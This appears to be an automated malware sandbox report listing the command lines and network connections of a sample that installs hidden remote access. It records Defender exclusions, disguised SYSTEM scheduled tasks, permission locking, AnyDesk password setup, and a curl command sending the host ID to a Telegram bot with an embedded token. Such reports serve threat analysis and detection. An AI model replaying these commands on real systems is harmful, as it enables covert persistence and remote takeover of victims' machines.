reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8600 /prefetch:1
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData/Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData/stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE1B.tmp\BE1C.tmp\BE1D.bat C:\ProgramData\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5884 /prefetch:2
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -k -f "https://api.telegram.org/bot7196577299:AAEob7nYSq_eAD8egojP3Pct71tZ1r_lZnI/sendMessage?chat_id=-1002158648396&text=Admin-1882521612"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| NL | 142.250.27.92:443 | pay.google.com | tcp |
| NL | 142.250.27.92:443 | pay.google.com | tcp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.201.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | pay.sandbox.google.com | udp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.27.81:443 | pay.sandbox.google.com | tcp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.iplogger.org | udp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 208.4.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| DE | 148.251.1.246:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| FR | 37.59.29.33:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:443 | relay-ad195ac5.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 33.29.59.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | 5.68.209.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 104.244.42.130:443 | api.twitter.com | tcp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 104.244.42.130:443 | api.x.com | tcp |
| US | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | 130.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.188.101.151.in-addr.arpa | udp |
| FR | 37.59.29.33:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| GB | 199.232.56.158:443 | video.twimg.com | tcp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| US | 8.8.8.8:53 | relay-0135ac48.net.anydesk.com | udp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| GB | 57.128.141.165:443 | relay-0135ac48.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.131.98:443 | spankbang.com | tcp |
| US | 104.19.131.98:443 | spankbang.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 158.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.131.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.244.42.130:443 | api.x.com | tcp |
| US | 104.244.42.130:443 | api.x.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.102.250.142.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| GB | 195.181.164.14:443 | c.ptgncdn.com | tcp |
| GB | 195.181.164.14:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.164.181.195.in-addr.arpa | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | flagb99273.spankbang.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.19.130.98:443 | flagb99273.spankbang.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | tcp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 104.18.176.151:443 | impactserving.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| GB | 89.187.167.5:443 | a.magsrv.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.176.18.104.in-addr.arpa | udp |
| GB | 195.181.164.21:443 | static.javhd.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | 5.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.182.117.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.229.211.95.in-addr.arpa | udp |
| GB | 195.181.164.16:443 | s3t3d2y8.afcdn.net | tcp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | tcp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.48.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | go.xhamsterlive.com | udp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| US | 104.17.112.106:443 | go.xhamsterlive.com | tcp |
| US | 8.8.8.8:53 | 106.10.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.112.17.104.in-addr.arpa | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | tcp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | vstream-10.sb-cd.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| DE | 156.146.33.59:443 | vstream-10.sb-cd.com | tcp |
| FR | 18.161.111.39:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | vstream-26.sb-cd.com | udp |
| US | 8.8.8.8:53 | strp.chat | udp |
| US | 104.17.117.12:443 | strp.chat | tcp |
| DE | 212.102.56.185:443 | vstream-26.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 59.33.146.156.in-addr.arpa | udp |
